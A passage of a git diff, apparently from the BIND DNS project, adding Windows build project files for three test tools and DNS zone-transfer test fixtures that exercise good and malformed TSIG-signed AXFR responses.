<RootNamespace>keydelete</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\tkey\keydelete.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/keydelete.vcxproj.user b/bin/tests/system/win32/keydelete.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/keydelete.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/pipequeries.vcxproj.filters.in b/bin/tests/system/win32/pipequeries.vcxproj.filters.in new file mode 100644 index 0000000..62374cd --- /dev/null +++ b/bin/tests/system/win32/pipequeries.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\pipelined\pipequeries.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/pipequeries.vcxproj.in b/bin/tests/system/win32/pipequeries.vcxproj.in new file mode 100644 index 0000000..1ce5b0a --- /dev/null +++ b/bin/tests/system/win32/pipequeries.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{E1478F40-786C-4738-8E99-E7A71DD98661}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>pipequeries</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\pipelined\pipequeries.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/pipequeries.vcxproj.user b/bin/tests/system/win32/pipequeries.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/pipequeries.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/resolve.vcxproj.filters.in b/bin/tests/system/win32/resolve.vcxproj.filters.in new file mode 100644 index 0000000..882e23f --- /dev/null +++ b/bin/tests/system/win32/resolve.vcxproj.filters.in @@ -0,0 +1,22 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="Source Files"> + <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier> + <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions> + </Filter> + <Filter Include="Header Files"> + <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier> + <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions> + </Filter> + <Filter Include="Resource Files"> + <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier> + <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions> + </Filter> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\resolve.c"> + <Filter>Source Files</Filter> + </ClCompile> + </ItemGroup> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/win32/resolve.vcxproj.in b/bin/tests/system/win32/resolve.vcxproj.in new file mode 100644 index 0000000..36bd283 --- /dev/null +++ b/bin/tests/system/win32/resolve.vcxproj.in @@ -0,0 +1,119 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="@TOOLS_VERSION@" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|@PLATFORM@"> + <Configuration>Debug</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|@PLATFORM@"> + <Configuration>Release</Configuration> + <Platform>@PLATFORM@</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{F66D8B7E-721D-4602-99AD-820D19AD1313}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>resolve</RootNamespace> + @WINDOWS_TARGET_PLATFORM_VERSION@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'" Label="Configuration"> + <ConfigurationType>Application</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + @PLATFORM_TOOLSET@ + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <LinkIncremental>true</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <LinkIncremental>false</LinkIncremental> + <OutDir>..\..\..\..\Build\$(Configuration)\</OutDir> + <IntDir>.\$(Configuration)\</IntDir> + <IntDirSharingDetected>None</IntDirSharingDetected> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|@PLATFORM@'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level4</WarningLevel> + <TreatWarningAsError>false</TreatWarningAsError> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <FunctionLevelLinking>true</FunctionLevelLinking> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <BrowseInformation>true</BrowseInformation> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;..\..\..\..\lib\irs\win32\include;..\..\..\..\lib\irs\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);..\..\..\..\lib\irs\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;libirs.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|@PLATFORM@'"> + <ClCompile> + <WarningLevel>Level1</WarningLevel> + <TreatWarningAsError>true</TreatWarningAsError> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>@INTRINSIC@</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion> + <WholeProgramOptimization>false</WholeProgramOptimization> + <StringPooling>true</StringPooling> + <PrecompiledHeaderOutputFile>.\$(Configuration)\$(TargetName).pch</PrecompiledHeaderOutputFile> + <AssemblerListingLocation>.\$(Configuration)\</AssemblerListingLocation> + <ObjectFileName>.\$(Configuration)\</ObjectFileName> + <ProgramDataBaseFileName>$(OutDir)$(TargetName).pdb</ProgramDataBaseFileName> + <ForcedIncludeFiles>..\..\..\..\config.h</ForcedIncludeFiles> + <AdditionalIncludeDirectories>.\;..\..\..\..\;@LIBXML2_INC@@OPENSSL_INC@..\..\..\..\lib\isc\win32;..\..\..\..\lib\isc\win32\include;..\..\..\..\lib\isc\include;..\..\..\..\lib\dns\include;..\..\..\..\lib\irs\win32\include;..\..\..\..\lib\irs\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories> + <CompileAs>CompileAsC</CompileAs> + </ClCompile> + <Link> + <SubSystem>Console</SubSystem> + <GenerateDebugInformation>false</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + <OutputFile>..\..\..\..\Build\$(Configuration)\$(TargetName)$(TargetExt)</OutputFile> + <LinkTimeCodeGeneration>Default</LinkTimeCodeGeneration> + <AdditionalLibraryDirectories>..\..\..\..\lib\isc\win32\$(Configuration);..\..\..\..\lib\dns\win32\$(Configuration);..\..\..\..\lib\irs\win32\$(Configuration);%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories> + <AdditionalDependencies>@OPENSSL_LIBCRYPTO@@OPENSSL_LIBSSL@@LIBXML2_LIB@libisc.lib;libdns.lib;libirs.lib;ws2_32.lib;%(AdditionalDependencies)</AdditionalDependencies> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClCompile Include="..\resolve.c" /> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> diff --git a/bin/tests/system/win32/resolve.vcxproj.user b/bin/tests/system/win32/resolve.vcxproj.user new file mode 100644 index 0000000..ace9a86 --- /dev/null +++ b/bin/tests/system/win32/resolve.vcxproj.user @@ -0,0 +1,3 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> +</Project>
\ No newline at end of file diff --git a/bin/tests/system/xfer/ans5/badkeydata b/bin/tests/system/xfer/ans5/badkeydata new file mode 100644 index 0000000..8dc80fb --- /dev/null +++ b/bin/tests/system/xfer/ans5/badkeydata @@ -0,0 +1,10 @@ +/SOA tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +/AXFR tsig_key abcd1234ffff/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 +/AXFR tsig_key abcd1234ffff/ +nil. 300 NS ns.nil. +nil. 300 TXT "bad keydata AXFR" +a.nil. 60 A 10.0.0.61 +/AXFR tsig_key abcd1234ffff/ +nil. 300 SOA ns.nil. root.nil. 3 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/badmessageid b/bin/tests/system/xfer/ans5/badmessageid new file mode 100644 index 0000000..e0dc041 --- /dev/null +++ b/bin/tests/system/xfer/ans5/badmessageid @@ -0,0 +1,10 @@ +/SOA tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR bad-id tsig_key LSAnCU+Z/ +nil. 300 NS ns.nil. +nil. 300 TXT "bad message id" +a.nil. 60 A 10.0.0.61 +/AXFR bad-id tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/goodaxfr b/bin/tests/system/xfer/ans5/goodaxfr new file mode 100644 index 0000000..e5ccd43 --- /dev/null +++ b/bin/tests/system/xfer/ans5/goodaxfr @@ -0,0 +1,10 @@ +/SOA tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 NS ns.nil. +nil. 300 TXT "initial AXFR" +a.nil. 60 A 10.0.0.61 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/partial b/bin/tests/system/xfer/ans5/partial new file mode 100644 index 0000000..e7eff8e --- /dev/null +++ b/bin/tests/system/xfer/ans5/partial @@ -0,0 +1,11 @@ +/SOA tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 +/AXFR/ +nil. 300 NS ns.nil. +nil. 300 TXT "partially signed AXFR" +a.nil. 60 A 10.0.0.61 +b.nil. 60 A 10.0.0.62 +/AXFR/ +nil. 300 SOA ns.nil. root.nil. 4 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/soamismatch b/bin/tests/system/xfer/ans5/soamismatch new file mode 100644 index 0000000..14cfa41 --- /dev/null +++ b/bin/tests/system/xfer/ans5/soamismatch @@ -0,0 +1,10 @@ +/SOA tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 1 300 300 604800 300 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 NS ns.nil. +nil. 300 TXT "SOA mismatch AXFR" +a.nil. 60 A 10.0.0.61 +/AXFR tsig_key LSAnCU+Z/ +nil. 300 SOA whatever. other. 1 300 300 604800 300 diff --git a/bin/tests/system/xfer/ans5/unknownkey b/bin/tests/system/xfer/ans5/unknownkey new file mode 100644 index 0000000..da7889b --- /dev/null +++ b/bin/tests/system/xfer/ans5/unknownkey @@ -0,0 +1,11 @@ +/SOA bad_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 5 300 300 604800 300 +/AXFR bad_key LSAnCU+Z/ +nil. 300 SOA ns.nil. root.nil. 5 300 300 604800 300 +/AXFR bad_key 